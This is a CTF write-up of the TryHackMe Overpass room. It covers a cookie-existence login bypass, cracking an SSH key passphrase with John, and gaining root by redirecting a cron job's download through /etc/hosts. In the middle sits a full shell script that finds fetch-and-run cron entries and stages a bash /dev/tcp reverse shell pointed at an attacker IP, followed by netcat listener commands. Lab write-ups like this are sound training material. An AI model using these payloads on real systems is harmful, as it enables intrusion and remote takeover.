Overpass | TryHackMe

Nihir Zala
7 min read · Feb 3, 2023


1. Hack the machine and get the flag in user.txt
Let’s start the target machine by clicking the green “Start Machine” button at the top of the task. Next, we need to connect to the TryHackMe network. I’m using a Kali virtual machine so I’ll use OpenVPN to connect.

Starting the target machine

We’ll do an nmap scan to check for open ports and services. We want the results to identify the service versions and be very verbose, so we’ll use the -sV and -vv flags. The following will be the full command we use.

nmap -sV -vv 10.10.95.150

From the scan we see that two ports are open: SSH and HTTP.

Results from the nmap scan

Let’s take a look at the website to see if we can find anything.

Homepage of the website

The homepage describes a password manager that we can download. Looking at the source code of the homepage, there is a developer comment about it.

Comment in the homepage source code

I looked at the rest of the site and downloaded the source code of the password manager to look at. I didn’t find anything interesting in either place. Let’s do a Gobuster scan using the common.txt wordlist to look for hidden directories. The following will be the command we use.

gobuster dir -u http://10.10.95.150 -w /usr/share/wordlists/dirb/common.txt

Gobuster finds a small list of directories.

Results of the Gobuster scan

The /css and /img directories don’t have anything interesting in them. The /admin page shows us a login form for the website.

Admin login page

Opening the browser’s Debugger tab on the admin page, we can see the JavaScript the page loads.

JavaScript being used

If we look at login.js we can see the code that sets a cookie after a successful login.

Script to set a cookie

The cookie is called “SessionToken”. We can add it ourselves either from the console or from the Storage tab: in the Storage tab, press the “+” button on the right of the screen and name the new cookie “SessionToken”. The server only checks that the cookie exists, not what its value is, so once we refresh the page we have admin access.

Getting admin access.

To add the cookie from the console, we can copy the “Cookies.set” call from login.js and replace the “statusOrCookie” argument with anything at all, even an empty string. We can use the following code in the console to create the cookie.

Cookies.set(“SessionToken”,"")

We can then hit enter and refresh the page and we get admin access.

Getting admin access from console

The page has a message to someone named James, with an RSA private key. Let’s copy and paste this key into a file called “rsakey” on our machine. The key is passphrase-protected, but we can use ssh2john to convert it into a hash format that john can crack (on Kali the script lives at /usr/share/john/ssh2john.py if it is not on your PATH). We’ll save the output to a file called “rsajohn” using the following command.

ssh2john rsakey > rsajohn

We now have a file that we can crack with John. Let’s use the rockyou.txt wordlist to crack it with the following command.

john --wordlist=/usr/share/wordlists/rockyou.txt rsajohn

Within a few seconds we get a hit on the password.

Getting the password for the rsakey

Before we can SSH into the target as James, we need to tighten the permissions on our rsakey file: ssh refuses to use a private key that is readable by other users. We can use the following command to do that.

chmod 600 rsakey

We can now SSH into the target using the following command, pointing ssh at the key with -i. It will prompt for the passphrase john just recovered.

ssh james@10.10.95.150 -i rsakey

Now that we’re logged in as James, let’s list the files to get the user flag.

Getting the user flag

Now we can start trying to escalate our privileges to root.

2. Escalate your privileges and get the flag in root.txt
We’ll start with what I think is the easiest way to escalate, listing our sudo permissions with sudo -l.

Trying to list our sudo permissions

Listing our permissions requires James’s password, which we don’t have. Let’s try using find to list the SUID executables on the box.

Listing our SUID executables

None of these are interesting for us. Let’s check the crontab on the machine.

Listing the crontab

Every minute, a cron job uses curl to fetch /downloads/src/buildscript.sh from the host overpass.thm and executes what it downloads. The hostname is resolved through /etc/hosts, so if we can edit that file and point overpass.thm at our own machine, the target will download, and run, a malicious buildscript.sh served by us.

This only works because /etc/hosts on this box is writable by our user (check with ls -l /etc/hosts). Using nano, we can edit the overpass.thm entry to our machine’s VPN IP.

Changing overpass.thm to our IP

Now the target will request /downloads/src/buildscript.sh from our machine, so we need to create that directory path (mkdir -p downloads/src) in the directory we are going to serve from, then use nano to create buildscript.sh inside it. The code we’ll use for the exploit will be the Bash reverse shell from PentestMonkey’s Reverse Shell Cheat Sheet, with the IP and port replaced with our own.

Adding the exploit to our directory

Next, we’ll have to start a web server for the target machine to connect to. The cron job’s URL has no port, so the server must listen on port 80, which needs root (or sudo) on our machine. We can do this with the http.server Python module, run from the directory that contains downloads/src, using the following command.

python3 -m http.server 80

The target machine will now be making requests to our machine. When it executes the script, we need a way to catch the shell that it sends back. We’ll use the following command to create a netcat listener.

rlwrap nc -lvnp 4444

In that command, -l listens, -v is verbose, -n skips DNS lookups, and -p sets the port; rlwrap adds line editing and history to the shell we get back. Once the minute ticks over, we can see the request made on our server.
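The steps above (find the cron job, redirect the hostname, stage the script at the exact path the job requests) are small enough to script. The following is an added example and not code from the original writeup: it pulls the host and path out of a crontab entry that pipes a download into a shell, renders the /etc/hosts line, validates the listener IP and port, and writes the reverse-shell script under a web root. The crontab line in the demo is constructed to match what the writeup describes; the IPs, port and temp paths are placeholders, and nothing here touches the real /etc/hosts.

```shell
#!/bin/sh
# Added example, not code from the original writeup: attacker-side staging for
# a cron job that fetches a script over HTTP by hostname and pipes it into a
# shell. The crontab line in demo() is constructed to match what the writeup
# describes; the IP, port and temp paths are placeholders.
set -eu

# Print "host path" for each crontab entry that fetches with curl/wget and
# pipes the result into a shell. Comment lines are skipped.
find_curl_pipe_cron() {
  grep -E '^[^#].*(curl|wget)[^|]*\|[[:space:]]*(ba)?sh' "$1" \
    | grep -oE '(https?://)?[A-Za-z0-9._-]+/[^ |]+' \
    | sed -E 's#^https?://##; s#/# #'
}

# The hijack only works if the hosts file the resolver consults is writable by us.
hosts_writable() { [ -w "${1:-/etc/hosts}" ]; }

# The line to add to the target's hosts file so that HOST resolves to LHOST.
hosts_line() { printf '%s %s\n' "$2" "$1"; }   # usage: hosts_line HOST LHOST

# Write the script the target will fetch: the /dev/tcp bash reverse shell from
# the PentestMonkey cheat sheet, aimed at LHOST:LPORT, at the exact relative
# path the cron job requests under WEBROOT. Prints the path written.
stage_payload() {
  webroot="$1"; relpath="$2"; lhost="$3"; lport="$4"
  echo "$lhost" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' \
    || { echo "stage_payload: bad LHOST '$lhost'" >&2; return 1; }
  case "$lport" in
    ''|*[!0-9]*) echo "stage_payload: bad LPORT '$lport'" >&2; return 1 ;;
  esac
  [ "$lport" -ge 1 ] && [ "$lport" -le 65535 ] \
    || { echo "stage_payload: LPORT out of range" >&2; return 1; }
  mkdir -p "$webroot/$(dirname "$relpath")"
  printf '#!/bin/bash\nbash -i >& /dev/tcp/%s/%s 0>&1\n' "$lhost" "$lport" \
    > "$webroot/$relpath"
  chmod 755 "$webroot/$relpath"
  echo "$webroot/$relpath"
}

# Demo against a constructed crontab in a temp dir; nothing touches /etc/hosts.
demo() {
  tmp=$(mktemp -d)
  cat > "$tmp/crontab" <<'EOF'
# constructed sample crontab, shaped like the entry described in the writeup
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
EOF
  find_curl_pipe_cron "$tmp/crontab" | while read -r host path; do
    echo "cron fetches http://$host/$path"
    echo "hosts entry to add on the target: $(hosts_line "$host" 10.9.1.2)"
    echo "payload written: $(stage_payload "$tmp/www" "$path" 10.9.1.2 4444)"
  done
  echo "then serve:  (cd $tmp/www && sudo python3 -m http.server 80)"
  echo "and listen:  rlwrap nc -lvnp 4444"
  rm -rf "$tmp"
}
demo
```

The two validation checks in stage_payload matter more than they look: a typo in the IP or port silently produces a script that the target runs every minute and that never calls back, which is exactly the kind of mistake that costs time while debugging the reverse shell.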

GET request from the target

After the request, we see our netcat listener catch the shell.

Catching the shell

With the shell, we can list our files and read the root flag.

Getting the root flag

We’ve completed the room! We’ve gone from an nmap scan to root using a cookie authentication bypass, John the Ripper, crontabs, and hosts editing. I hope this writeup could be helpful in completing the room! If you are still struggling please leave a comment or message me on Twitter and I will try my best to assist!

Lessons Learned:

  • A login check that only tests whether a session cookie exists, and never validates its value, can be bypassed by setting the cookie yourself
  • Scheduled tasks that download and run code can be hijacked when you control the name resolution or the file being fetched

Things I struggled with:

It took me a long time to find the cookie bypass on the website. For some reason I never checked the debugger menu so I was trying different ways to get the correct cookie on the browser. In the bash code I used for the reverse shell, I had a typo which kept returning an error which I spent about 15 minutes debugging.

Conclusion:

This room is good! I liked that it used a vulnerability that is uncommon in most rooms. Once you figure out the scheduled task vulnerability, you can kind of do whatever you want to get root which I think is fun. I could come back to this room and use different code to get root which is cool. I would recommend this to someone who has completed the OWASP Top 10 room and some CTF rooms and wants a challenge.


Written by Nihir Zala

Hi there, I'm Nihir Zala, a Laravel developer from Gujrat, India, with over 2.5 years of professional experience. I am also learning pentesting from THM and HTB.
